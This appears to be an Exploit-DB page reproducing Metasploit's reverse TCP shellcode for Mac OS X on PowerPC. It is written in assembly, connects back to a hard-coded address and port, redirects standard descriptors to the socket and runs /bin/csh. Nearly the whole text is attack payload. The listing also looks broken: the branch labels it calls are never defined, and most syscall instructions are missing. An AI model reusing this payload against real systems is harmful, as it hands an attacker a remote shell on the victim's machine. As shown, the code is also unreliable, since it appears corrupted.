OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode

ID EDB-ID:43611
Type exploitdb
Reporter Exploit-DB
Modified 2009-01-01T00:00:00


OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode. Shellcode exploit for OSX_PPC platform. Tags: Metasploit Framework (MSF)

;        Name: single_reverse_tcp
;   Qualities: Can Have Nulls
;   Platforms: MacOS X / PPC
;     Authors: H D Moore < hdm [at] metasploit.com >
;     Version: $Revision: 1.1 $
;     License:
;        This file is part of the Metasploit Exploit Framework
;        and is subject to the same licenses and copyrights as
;        the rest of this package.
; Description:
;        Connect back and spawn a shell

.globl _main
	;; socket
	li      r3, 2
    li      r4, 1
    li      r5, 6
    li      r0, 97
    xor     r0, r0, r0
    mr      r30, r3

    bl		_connect
    .long 	0x00022211
    .long 	0x7f000001

    mflr    r4
    li      r5, 0x10
    li      r0, 98
    mr      r3, r30
	xor.	r5, r5, r5

	li      r5, 2

    li      r0, 90
    mr      r3, r30
    mr      r4, r5
    xor     r0, r0, r0
    subi    r5, r5, 1
    cmpwi   r5, -1
    bnel    _dup2

    li      r0, 2
	xor.	r5, r5, r5

    xor.    r5, r5, r5
    bnel    _execsh
    mflr    r3
    addi    r3, r3, 28
    stw     r3, -8(r1)      ; argv[0] = path
    stw     r5, -4(r1)      ; argv[1] = NULL
    subi    r4, r1, 8       ; r4 = {path, 0}
    li      r0, 59
    sc                      ; execve(path, argv, NULL)

; csh removes the need for setuid()
	.ascii  "/bin/csh"
	.long   0x00414243